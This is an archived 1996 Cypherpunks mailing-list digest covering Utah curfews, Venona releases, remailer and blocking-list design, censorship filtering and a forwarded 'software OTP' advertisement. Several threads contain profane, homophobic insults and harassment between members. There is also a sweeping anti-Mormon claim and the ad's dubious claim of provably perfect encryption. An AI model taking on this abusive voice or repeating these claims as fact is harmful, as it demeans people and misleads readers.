> >> >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley
> >> >> ]
> >> >> ]
> >> >> ] Datacomms Technologies web authoring and data security
> >> >> ] Paul Bradley, Paul at fatmans.demon.co.uk
> >> >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org
> >> >> ] Http://www.cryptography.home.ml.org/
> >> >> ] Email for PGP public key, ID: 5BBFAEB1
> >> >> ] "Don`t forget to mount a
scratch monkey"
> >> >>
> >> >Fuckhead.
> >> > >Fuckhead. We know your behind Vulis, Cock-sucker
> and he swallows

From moroni at scranton.com Mon Sep 30 00:03:14 1996
From: moroni at scranton.com (Moroni)
Date: Mon, 30 Sep 1996 15:03:14 +0800
Subject: Utah as a Religious Police State
In-Reply-To:
Message-ID:

I never cease to be surprised by the interest that gentiles show in working mormon communities while totally neglecting their own failing areas.

On Sun, 29 Sep 1996, Timothy C. May wrote:

>
> (I received this message, with "cypherpunks at sybase.com" as well as
> "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for
> the Cypherpunks list, with some sybase domain name weirdness, or reflector,
> going on.)
>
> At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
> >I guess that depends on your definition of liberty. The Mormons
> >originally moved there to have a place to practice their religion,
> >and have freedom from persecution. I suppose one could extend that
> >to wanting a place to have the freedom to have a set of rules consistent
> >with their beliefs. Should that include freedom from interference from
> >folks such as yourself who want to change their rules, even though
> >you're not presently affected?
>
> Well, if Utah can rig a way to _secede_ from the Union, your arguments
> would make more sense. But so long as they are part of these United States,
> their religious beliefs about when children should be at home cannot
> supersede basic liberties.
>
> (There are some thorny issues about whether _minors_ have full civil
> rights. But I certainly know that _my_ civil rights are being affected when
> my children are not allowed on the streets after some hour. If my child is
> out, this is my problem. I neither want cops to stop-and-detain my
> children, nor do I want my tax monies to be used to control the behavior of
> other people's children. Providing no crimes are being committed, curfews
> for the sake of controlling the behavior of children are no more just than
> would be a bunch of related behavior control laws, e.g., a ban on comic
> books, a mandate that all children join after-school youth leagues, etc.)
>
> As for "changing their rules," you're missing the point. There are
> presumably many in Utah who believe as I do (maybe even some Mormons).
> Those who are living in Utah, as renters, owners, whatever, should not be
> bound by unconstitutional rules, no matter how many Mormon Elders favor
> them. Unless the Mormons own _all_ of the property (and maybe not even
> then, as renters have civil rights), they cannot impose their own notions
> of morality on the rest of the population, except in compelling cases
> (e.g., involving the well-known actual _crimes_).
>
> I don't mean to pick on Mormons, as other communities have also attempted
> to impose curfews and other restrictions on the children of others. My ire
> was raised by Attila's enthusiastic support for laws which no
> freedom-loving person should be enthusiastic about. Again, I have no
> problem with Attila restricting his own children's movements, or joining
> with other parents to control the behavior of their _own_ children, via
> religious camps, religious schools, youth leagues, etc. He can even make
> his own kids wear funny uniforms, funny religious hats, whatever.
>
> But, for example, telling _me_ when _my_ children may be out on public
> streets (doing nothing illegal, neither robbing nor spray-painting nor
> committing any other real crimes) is unacceptable.
>
> I urge Attila (and others) to rethink enthusiastic support for curfews.
>
> --Tim May
>
>
>
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May | Crypto Anarchy: encryption, digital money,
> tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
>
>
>
>

From scmayo at rschp2.anu.edu.au Mon Sep 30 00:03:27 1996
From: scmayo at rschp2.anu.edu.au (Sherry Mayo)
Date: Mon, 30 Sep 1996 15:03:27 +0800
Subject: GCHQ releases Venona files (from UK Telegraph)
Message-ID: <199609300451.VAA05353@toad.com>

Hi all,

A couple of articles from the UK Daily Telegraph may be of interest. The earlier one "Codebreakers come clean" is about the upcoming conference on cold war intelligence & mentions the continued release of the NSA's Venona files (see http://www.nsa.gov:8080/docs/venona/venona.html)

The article is at:
http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//96/9/29/wspy29.html

The second is about the GCHQ (UK equivalent of NSA) releasing its own Venona files in response to the NSA release.
http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//96/9/30/ngch30.html

These are being released into the public records office, but there is no indication that they will appear on the net for the time being.

Sherry

From haystack at cow.net Mon Sep 30 01:13:27 1996
From: haystack at cow.net (Bovine Remailer)
Date: Mon, 30 Sep 1996 16:13:27 +0800
Subject: A periodic alert regarding Tim May
Message-ID: <9609300606.AA23260@cow.net>

Tim May styles his facial hair to look more like pubic hair.

From rp at rpini.com Mon Sep 30 01:34:52 1996
From: rp at rpini.com (Remo Pini)
Date: Mon, 30 Sep 1996 16:34:52 +0800
Subject: crypto cd
Message-ID: <9609300624.AA07020@srzts100.alcatel.ch>

-----BEGIN PGP SIGNED MESSAGE-----
Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
To: cypherpunks at toad.com
Date: Mon Sep 30 07:21:49 1996

Still looking for material...
especially: sci.crypt archives (10.1994 until now... Mark Riordan???) sci.crypt.research archives (all) other relevant news groups has anybody got anything? remo - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: http://www.rpini.com/crypto/crypto.html -----END PGP SIGNATURE----- From hereh at stud.uni-sb.de Mon Sep 30 01:34:54 1996 From: hereh at stud.uni-sb.de (Hendrik Reh) Date: Mon, 30 Sep 1996 16:34:54 +0800 Subject: Looking for Codebreaker's by David Kahn Message-ID: <324EF031.187D@stud.uni-sb.de> I'm looking for Codebreakers by David Kahn !! Can anybody give me a hint where I can get this book thanx -- ,,,, Gruss, /'^'\ Hendrik ( o o ) -oOOO--(_)--OOOo------------------------------------------------ Hendrik Reh, Tel. : +49 0681 48362 .oooO WWW: http://fsinfo.cs.uni-sb.de/~garetjax/ ( ) Oooo. eMail: hereh at stud.uni-sb.de ---\ (----( )------------------------------------------------- \_) ) / (_/ From dthorn at gte.net Mon Sep 30 02:19:59 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 30 Sep 1996 17:19:59 +0800 Subject: Cryptography.. In-Reply-To: Message-ID: <324F6D8E.370B@gte.net> Erp wrote: > What is the maximum encryption allowed to be created. With export > restrictions in mind, and without export restrictions in mind... > Thanks... > By WORLD and US standards please... > much appreciated.. > export from the US to elsewhere that is also..
> reply asap is much appreciated Well, if you do the wrong thing, better encrypt it so nobody knows.... From dthorn at gte.net Mon Sep 30 02:31:51 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 30 Sep 1996 17:31:51 +0800 Subject: Workers, Public Schools, Tradesmen, and Justice In-Reply-To: <199609290126.UAA00307@smoke.suba.com> Message-ID: <324F65DC.21FF@gte.net> snow wrote: > Mr. May said: > > At 1:35 PM -0500 9/27/96, jbugden at smtplink.alis.ca wrote: > > >If you want to refuse those who are too stupid or anti-social from > > >Public Schools in order to improve the social or intellectual > > >climate, you better have a solution for the resulting cast-offs. [text deleted: trade schools, welfare system, etc.] > People die for all manner of reasons every day. Fuck'em. > Petro, Christopher C. > petro at suba.com > snow at smoke.suba.com Seems to me they had excellent solutions in the 1930's. Bread lines for those who needed food and couldn't find work. Labor camps for those who wanted to work anyway. From gbroiles at netbox.com Mon Sep 30 02:34:41 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Mon, 30 Sep 1996 17:34:41 +0800 Subject: What about making re-mailers automatically chain? Message-ID: <3.0b19.32.19960929222542.006b0ed0@ricochet.net> >Would it be a good idea to have a re-mailer "randomly" decide whether to >send the mail to the destination or to another re-mailer. No. The remailer user should be presumed to know what s/he wants. Some remailer users may want to optimize for speed and certainty of delivery and therefore use a short chain; other users may want to optimize for more difficult traceability, and consequently choose a long chain. Remailers shouldn't try to rewrite the user's (perhaps) deliberate balancing of these factors. Also, users may choose to use or not use certain remailers based upon their policies, the reputation of the operators, the legal rules affecting the operators, and so forth. 
These choices should also be left to the user and not overridden by third parties. > If all >re-mailers performed this way, not even the sender would know the path. I don't see why this is useful. As things work now, only the sender knows the path, assuming chaining and nesting encryption. How does taking away the sender's knowledge add security? Adding hops to the chain requires that remailers keep track of other remailers; a robust way of doing this would require that they also keep track of reliability, because deciding to add a downed (or unreliable) remailer to a chain would be harmful. To prevent an active and hostile eavesdropper from adding itself as a remailer eligible to receive extra hops (and then dropping or logging the traffic), this remailer status information should be provided by a trusted source in a secure manner. All of this (adding remailer status tracking based on frequent updates of digitally signed information from a trusted third party) can be done, but it's a pain in the ass to code, and it doesn't add anything that users can't get for themselves. (Users who want long difficult-to-trace chains can already generate them. They can also let software generate random chains at the source.) It also may degrade performance for users who value speed and reliability over untraceability. So I suggest that it's not very useful. The best way to implement this would be to modify remailers to use "Anon-To: random" or "Random-To: xxx at yyy.zzz" header commands, such that users who desired the random hop behavior could get it, but users who didn't want it wouldn't get it unexpectedly. (Isn't some remailer doing this already? I've lost track.) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." 
http://www.io.com/~gbroiles | | From dthorn at gte.net Mon Sep 30 02:43:37 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 30 Sep 1996 17:43:37 +0800 Subject: active practice in America In-Reply-To: <199609290438.WAA23813@infowest.com> Message-ID: <324F6997.4856@gte.net> attila wrote: > In <199609290133.UAA00319 at smoke.suba.com>, on 09/28/96 > at 08:33 PM, snow said: > > A Person going by the name Attila said: > > to put it another way: in criminal proceedings: I would rather > > be considered guilty, until proven innocent; than I would be > > presumed innocent, until proven guilty beyond a reasonable doubt. > =If you were the person being _tried_ for a crime, you would rather > =have to prove that you COULDN'T POSSIBLY have committed the crime as > =opposed to having to have the government PROVE that you DID DO it? > you bet --the objective of the defense is to cast aspersions > on the government prosecutors --in other words, create that > doubt. you do not need to prove your innocence unconditionally, > just "taint" the prosecutor a bit. however, in many cases you are > guaranteed a trial by a jury of your peers. > as for peers --look at OJ, and the reverse weighting of the > Santa Monica jury v. downtown. Speaking of peers, what would the founding fathers have said about the trial of the officers in the Rodney King case? Would they, as police officers, have a right to a jury of their peers? Would their peers be the people in Simi Valley, where many or most of them live? Or would it be more appropriate to have a jury of the victims' peers? Or both?
From stewarts at ix.netcom.com Mon Sep 30 02:50:43 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 30 Sep 1996 17:50:43 +0800 Subject: Making Remailers Widespread [REMAILERS] Message-ID: <199609300728.AAA17384@netcomsv.netcom.com> At 09:37 AM 9/29/96 EDT, you wrote: >How about: maintain a list of trusted blocking-list sites (comparable to the >list of remailers used for chaining) and when it comes the time to update the >local copy of the blocking list, ask a random one on the list; if it's down, >ask another random one on the list. There may even be more than one list. :-) Getting more complex, but it might be workable. >> sender-blocking list ... >With most ISP's it's trivial to forge one's From: header in SMTP. >Switching to another dime-a-dozen throwaway account is also trivial. >Just admit that you can't block senders, and don't pretend that you >can - false pretenses destroy one's credibility. You obviously can't source-block a determined spammer, but you can slow down some spam attacks, especially if they're one individual using his/her regular account. It's no panacea, but it helps. Also, if you source-block based on patterns anywhere in the header, you can catch less capable email forgers. >I think I see a way to accomplish this without too much trouble. >When an e-mail is directed at u at c4.c3.c2...c1, the code that checks >for blocking will search for the following records in the blocking list: >u at c4.c3.c2...c1 (exact match) >*@c4.c3.c2...c1 (replace user by *) >u@*.c3.c2...c1 (replace leftmost .-separated piece of domain by *) >*@*.c3.c2...c1 (both) >and repeat until there are only 2 components left in the domain name. That'd work. It's clunky, but there's no avoiding clunkiness for this sort of thing, and it does preserve privacy. >Now, the question is, who would be allowed to add records containing >'*' to the blocking list using the cookie protocol? I suggest that it be >one of the contacts listed in Internic's database.
postmaster at domain is (ostensibly) guaranteed to exist. The Internic database is an interesting alternative, but for this I suspect postmaster is good enough. There's also the problem that for many domains, where smallcompany.com is virtual on an ISP, the Internic database will generally list someone at the ISP, who probably has no interest in the issue, rather than someone responsible for making decisions about smallcompany.com >Thus a blocking record for cypherpunks at toad.com could be added by >anyone listed in toad.com's Internic entry. There's no need for any >Remailer Cabal [tinc] to maintain blocking lists. For destination blocking, I agree that users should be able to block their own stuff as automagically as possible. For source blocking, most of the need is for spams and abusers that have been tracked down (or identify themselves in their postings), and that takes human thought. In particular, spammers are unlikely to block themselves from the remailers (:-), but forgers may try to block legitimate users. >One other suggestion: instead of storing one bit of information (the >address is on the list or not), why not have several flag bits. >E.g., the blocking list could contain records similar to: >hash - e.g. 160-bit SHA >flags - e.g. reserve 32 bits Interesting. I suspect the state of the art would be to collect the bits with a disclaimer that there isn't any code to interpret them :-), but it does let you build a blocking database that's usable as capabilities grow. Any suggestions for flags besides block/allow one-way, block/allow two-way, and max-size? I'm thinking of doing a remailer that instead of sending you a message, it sends you a retrieval cookie and lets you send it back to collect the message; blocking that would be another flag. 
The other kind of blocking that needs adding is blocking by words in message bodies - the spammer that caused me to shut down my remailer and not bring it back up was posting hate messages with somebody else's name and email signed at the bottom. It only took one or two to generate a flood of flames to the victim, and my current remailer couldn't block any followups. Also, since the spammer wasn't generating the flames himself, his spam slipped under the remailer's spam counter, just as hipcrime's did. This sort of blocking also lets you block things like the hipcrime spam and MAKE MONEY FAST. But it's a much more sensitive problem - anybody who can add things to the body-checking list can start doing real censorship, and it's probably best to leave that to individual operators to block, or at least to turn on by hand rather than default. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From nobody at cypherpunks.ca Mon Sep 30 02:57:15 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Mon, 30 Sep 1996 17:57:15 +0800 Subject: Tools for Rendering Censorship Firewalls Ineffective In-Reply-To: <199609300259.TAA04617@dfw-ix8.ix.netcom.com> Message-ID: <199609300727.AAA05186@abraham.cs.berkeley.edu> > The obvious techniques I can see include > 1) Filter on IP address (e.g. German attack on XS4ALL) > 2) Filter on DNS Name > 3) Filter on Patterns in URL > 4) Filter on Patterns in PUT/GET Requests > 5) Filter on Patterns in Response. > 6) Traffic Analysis on reading patterns 7) Punish all those accessing forbidden web sites with caning or forced labor. From yjkim at ssrnet.snu.ac.kr Mon Sep 30 07:04:26 1996 From: yjkim at ssrnet.snu.ac.kr (Kim Yoonjeong) Date: Mon, 30 Sep 1996 22:04:26 +0800 Subject: the key of DES Message-ID: <199609301017.UAA04791@ssrnet.snu.ac.kr> Hello, all ! 
Given an unknown DES system with 64-bit plaintext p and ciphertext c, can there be MORE THAN ONE key? If so, what is the probability (big or small)? Sincerely, - Yoonejong =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Yoonjeong Kim Email: yjkim at ssrnet.snu.ac.kr Department of Computer Engineering Phone: +82-2-875-7726 (office) Seoul National University +82-2-872-9801 (home) Seoul 151-742 Korea Fax: +82-2-875-7726 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From adam at homeport.org Mon Sep 30 07:36:37 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 30 Sep 1996 22:36:37 +0800 Subject: (Firewalls) Where is that Snake Oil FAQ again? Message-ID: <199609301247.HAA17135@homeport.org> This may of course, just be a troll. ----- Forwarded message from Anonymous ----- >From firewalls-owner at GreatCircle.COM Sun Sep 29 21:27:09 1996 Date: Mon, 30 Sep 1996 02:37:26 +0200 (MET DST) Message-Id: <199609300037.CAA20690 at basement.replay.com> Subject: New Release - Software OTP Encryption. Content-Type: TEXT/PLAIN; charset=US-ASCII To: firewalls at GreatCircle.COM From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited XComm: Replay may or may not approve of the content of this posting XComm: Report misuse of this automated service to Sender: firewalls-owner at GreatCircle.COM Precedence: bulk I apologize for this intrusion into your affairs. Please forgive but we do have important information that will be of interest to Internet users. Would you like to secure your hard disk files against compromise by Internet Interlopers? Would you like to communicate over Internet in absolute privacy? We can provide you with the tools necessary to do those two things in an absolute sense. Briefly, we have developed the first software sourced OTP, which is provably as good as any hardware sourced OTP that can possibly be generated.
Most experts thought that this could not be done, but we have done it, and can prove it. Our prices are: - $95.00 for a complete dual user system, the full package for two users, but your communications are limited to that single user - - $95.00 for a complete Elita unlimited usage system - that is you can protect your internal files, and communicate with anyone else that has an Elita system, or more comprehensive Ultima system below. - $195.00 for a complete Ultima Internet/intranets system, this allows user to protect their own files - communicate with anyone that has an Ultima, or an Elita, system - to form hierarchal work groups that provide the same protection - and to customize their system variables to achieve the maximum entropy. We are also going to open up the whole company for outside participation - it is going to a completely open Internet Distributive Company, we believe the first one of its kind. Anyone is welcome to participate in the venture. All marketing is to be done on an lucrative MLM basis, program development will be done on a royalty/commission on adjusted gross income basis. Everyone that participates will share in the rewards. System testing will also be handle in a similar manner, and system engineering will be handled on a fee for services and participation basis. If you can perform, you can win big, really big. If you just try to perform, you will still win. This is an important opportunity for you, take advantage of it at this most opportune time, To order, call us at 817-691- 1081, or write to us at 2629 Plaza Parkway, Suite B-20, Wichita Falls, Texas, or order through Internet or e-mail us at: ipgsales at netprivacy.com. For more details, visit our web site at: http://www.netprivacy.com Our apologies again, but we believe it to be important. Appreciatively, Don Wood, IPG "None can be so true to your secret as yourself." 
- Sa'Di ----- End of forwarded message from Anonymous ----- -- "It is seldom that liberty of any kind is lost all at once." -Hume From ses at tipper.oit.unc.edu Mon Sep 30 08:34:44 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 30 Sep 1996 23:34:44 +0800 Subject: An ITAR moment Message-ID: I'm currently sitting in a computer lab at the ICM in Warsaw, at a workshop on caching in the web. I wanted to log back home to check my email, so I asked if they had telnet or something. "Actually, we're disabling rlogin and telnet on our machines - can you use ssh?". Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From trei at process.com Mon Sep 30 09:58:04 1996 From: trei at process.com (Peter Trei) Date: Tue, 1 Oct 1996 00:58:04 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) Message-ID: <199609301325.GAA13466@toad.com> > On Sun, 29 Sep 1996 12:16:27 -0800, Timothy C. May wrote: > > >Symmetric multiprocessing is available, but it's often much less hassle to > >have a single CPU running at 200 MHz than to try games with multiple > >processors (which means more PCB real estate, more sockets, more of other > >things). > > As far as SMP goes, it's actually not all that expensive. People in the > linux-smp list have reported differences of as little as $50 for a > uniprocessor vs. dual pentium system. Of course, every so often we'll get a > message about a $30,000 system that can handle up to 64 Pentium > Pros! Check out http://www.ssd.intel.com/tflop.html, where Intel is building a 9000 Pentium Pro (200 MHz) machine for Sandia. Yes, it runs Unix, and they've already delivered the first 64 processor node. When finished, it will have 600Gbyte RAM, 200Tbyte disk, and run at about 1.8 Tflops, and cover about 1600 square feet. Price? 46 M$, or about $5k/processor. 
Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From mirele at xmission.com Mon Sep 30 10:04:43 1996 From: mirele at xmission.com (Deana Holmes) Date: Tue, 1 Oct 1996 01:04:43 +0800 Subject: Utah as a Religious Police State Message-ID: <199609301251.GAA09713@mail.xmission.com> On 29 Sep 96 at 17:36, Ryan Russell/SYBASE wrote: > Hmm...never heard that one before. Care to produce > a reference? > > (Or am I supposed to be ignoring this guy when he > makes ridiculous claims?) > > Ryan I suspect that Dmitri is referring to the Mountain Meadows Massacre. It's not a pretty story and is one of the low points of Mormon history. The late historian Juanita Brooks wrote about the massacre, and about the leader, John D. Lee, in a couple of books. > ---------- Previous Message ---------- > To: cypherpunks > cc: > From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp > Date: 09/29/96 05:54:09 PM > Subject: Re: Utah as a Religious Police State > > Ryan Russell/SYBASE writes: > > I guess that depends on your definition of liberty. The Mormons > > originally moved there to have a place to practice their religion, > > and have freedom from persecution. I suppose one could extend that > > to wanting a place to have the freedom to have a set of rules consistent > > with their beliefs. Should that include freedom from interference from > > folks such as yourself who want to change their rules, even though > > you're not presently affected? > > It's worth noting that one of Utah mormons favorite pastimes was to ambush > the settlers heading for California, kill them all, and take their property. > However the mormons were dealt with much less severely than the local Indians > who tried the same tricks. Pity. ===end vulis rant=== Deana Deana M.
Holmes April 1996 poster child for clueless $cientology litigiousness alt.religion.scientology archivist since 2/95 mirele at xmission.com From mirele at xmission.com Mon Sep 30 10:06:06 1996 From: mirele at xmission.com (Deana Holmes) Date: Tue, 1 Oct 1996 01:06:06 +0800 Subject: Utah as a Religious Police State Message-ID: <199609301250.GAA09647@mail.xmission.com> On 30 Sep 96 at 0:55, Moroni wrote: > I never cease to be surprised by the interest that gentiles show in > working mormon communities while totally neglecting their own failing > areas. I never cease to be surprised by Mormon apologists who refuse to look in the mirror at problems in so-called "working Mormon communities." I moved to Utah 2 years ago from Texas. Even though I am nominally Mormon (I haven't been to Church in years), it was still a huge culture shock to me. I think the thing that bugs me the most is the way the political system is dominated by a 500 lb. elephant known as the LDS Church. We Utahns sit in a room with this elephant that eats and s**ts and yet we don't talk about the fact that it's there. This is Utah for you...Utah where during the first legislative session I was here (1995) the legislature spent 42 out of 45 days talking about whether they were going to have tightened ethics laws. Where during the last legislative session (1996) the legislature spent 42 of 45 days discussing what to do about the fact that a few kids in one of the Salt Lake high schools wanted to have a gay/lesbian/straight club. NO MATTER that the schools are horribly overcrowded and that in some elementary grades 40-plus students per classroom is the norm. NO MATTER that teachers are horribly underpaid in a state with California-style costs. NO MATTER that despite a $100 million surplus the governor and the legislature can't see clear to get rid of the sales tax on *food*. 
NO MATTER that if anything terribly controversial (or even not so controversial) comes up, someone in the legislature feels like they have to sound out the Church to make sure that they don't cross Gordon B. Hinckley or Boyd K. Packer and endanger their Church membership. In the meantime, our legislators (with Church approval, these are Church "callings") run down to the prison at Point of the Mountain to "counsel" convicted child abusers and then pass laws to get rid of minimum mandatory sentencing. The roads are falling apart here, the schools are overcrowded. Gang violence is prevalent up and down the Wasatch Front. I heard about a gang-related murder in Layton last weekend. Up until a month ago, when the mayor of Salt Lake City closed the place and forced them out, there was a well-known open-air drug supermarket going on in Pioneer Park. Legislative leaders think that they're above the Open Meetings law. And liquor laws still are pretty backwards. (Gee, just last week places that sell beer actually got permission to put signs that say "BEER" instead of "BEE?" on their premises.) Thing is, Utah is generally a wonderful place to live. As I said, I used to live in Texas. It's great to live in a place where the economy is booming and there are jobs available. The crime rate is pretty low for an urban community (but there are sore spots, as I indicated above). The scenery is downright spectacular. And Salt Lake City proper is a pretty cool place. But I don't believe that Utah is immune to the problems that beset other cities. One thing that would help is for Utah opinion-makers to admit that not everyone who lives in this "pretty, great state" is a devout Mormon and/or a Republican. Not everyone shares the same values as the dominant religion, and they shouldn't have to. I apologise to the cypherpunks mailing list for this rant, but not everyone in Utah agrees with the view expressed by Moroni above. Deana Deana M. 
Holmes April 1996 poster child for clueless $cientology litigiousness alt.religion.scientology archivist since 2/95 mirele at xmission.com From dlv at bwalk.dm.com Mon Sep 30 10:20:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 1 Oct 1996 01:20:36 +0800 Subject: [SPAM] Another "petard" from Timmy "peteur" May and his young friends In-Reply-To: <199609300441.AA10704@crl12.crl.com> Message-ID: Timmy May has no life. >From: Troy Varange >Message-Id: <199609300441.AA10704 at crl12.crl.com> >Subject: Re: Vulis FUCKHEAD sucks Timmy's Cock >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Date: Sun, 29 Sep 1996 21:41:42 -0700 (PDT) >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 11:58:09 pm >X-Mailer: ELM [version 2.4 PL23] >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >Content-Length: 5298 > >Vulis sucks Timmy's boyfriend's cock. >> >> Timmy May has no life. >> >> >From: Troy Varange >> >Message-Id: <199609300332.AA09870 at crl12.crl.com> >> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May >> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT) >> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm >> >X-Mailer: ELM [version 2.4 PL23] >> >Mime-Version: 1.0 >> >Content-Type: text/plain; charset=US-ASCII >> >Content-Transfer-Encoding: 7bit >> >Content-Length: 4378 >> > >> >> berserk >> >> Timmy May has gone . Has he been eating speed? 
>> >> bananas >> >> >> >> >From: Troy Varange >> >> >Message-Id: <199609300138.AA08482 at crl12.crl.com> >> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May >> >> >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT) >> >> >In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm >> >> >X-Mailer: ELM [version 2.4 PL23] >> >> >Mime-Version: 1.0 >> >> >Content-Type: text/plain; charset=US-ASCII >> >> >Content-Transfer-Encoding: 7bit >> >> >Content-Length: 3442 >> >> > >> >> >> >> >> >> What has Timmy been smoking? >> >> >> >> >> >> ]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 >> >> >> ]Received: by bwalk.dm.com (1.65/waf) >> >> >> ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT >> >> >> ] for dlv >> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; >> >> >> ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 >> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; >> >> >> ] 29 Sep 96 15:59 BST >> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net >> >> >> ] id aa09441; 29 Sep 96 15:54 BST >> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP >> >> >> ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 >> >> >> ]Comments: Authenticated sender is >> >> >> ]From: paul at fatmans.demon.co.uk >> >> >> ]To: "Dr.Dimitri Vulis KOTM" >> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000 >> >> >> ]Mime-Version: 1.0 >> >> >> ]Content-Type: text/plain; charset=US-ASCII >> >> >> ]Content-Transfer-Encoding: 7BIT >> >> >> ]Subject: Re: Possible subs attack???? 
>> >> >> ]Priority: normal >> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4 >> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31) >> >> >> ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> >> >> >> ] >> >> >> ]-----BEGIN PGP SIGNED MESSAGE----- >> >> >> ] >> >> >> ] >> >> >> ]> The lying sack of shit Timmy May writes: >> >> >> ] >> >> >> ]> The lying sack of shit Timmy May lies again, as usual. >> >> >> ] >> >> >> ]Fuck you, >> >> >> ] >> >> >> ]I am not Tim May, Check out the return path if you don`t believe me, >> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they >> >> >> ]don`t sign keys here and there without checking ID`s... >> >> >> ] >> >> >> ]Type Bits/KeyID Date User ID >> >> >> ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley >> >> >> ] >> >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK----- >> >> >> ]Version: 2.6.3ia >> >> >> ] >> >> >> ]- -----END PGP PUBLIC KEY BLOCK----- >> >> >> ] >> >> >> ] >> >> >> ] >> >> >> ]-----BEGIN PGP
SIGNATURE----- >> >> >> ]Version: 2.6.3ia >> >> >> ]Charset: cp850 >> >> >> ] >> >> >> ]-----END PGP SIGNATURE----- >> >> >> ] >> >> >> ] Datacomms Technologies web authoring and data security >> >> >> ] Paul Bradley, Paul at fatmans.demon.co.uk >> >> >> ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org >> >> >> ] Http://www.cryptography.home.ml.org/ >> >> >> ] Email for PGP public key, ID: 5BBFAEB1 >> >> >> ] "Don`t forget to mount a scratch monkey" >> >> >> >> >> >Fuckhead. >> >> >> >Fuckhead. We know your behind Vulis, Cock-sucker >> >and he swallows From gcg at pb.net Mon Sep 30 10:24:05 1996 From: gcg at pb.net (Geoffrey C. Grabow) Date: Tue, 1 Oct 1996 01:24:05 +0800 Subject: What about making re-mailers automatically chain? Message-ID: <3.0b15.32.19960930085114.0068dec0@mail.pb.net> A non-text attachment was scrubbed... Name: not available Type: text/enriched Size: 2540 bytes Desc: not available URL: From wombat at mcfeely.bsfs.org Mon Sep 30 10:48:59 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 1 Oct 1996 01:48:59 +0800 Subject: Does any body know anything about this? In-Reply-To: <199609292138.OAA27616@abraham.cs.berkeley.edu> Message-ID: On Sun, 29 Sep 1996, John Anonymous MacDonald wrote: > Is this just more snakeoil or is this real? No, it is Matt Blaze. Go and read every altavista search hit on his name as your penance for posting this. ;) -r.w.
> University of Cambridge Computer Laboratory
>
> EXTRA SEMINAR
>
> SPEAKER: Matt Blaze
> AT&T Research
>
> DATE: Monday 23rd September 1996 at 11.30 am
>
> PLACE: Room TP4, Computer Laboratory
>
> TITLE: SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS

From jya at pipeline.com Mon Sep 30 11:07:50 1996
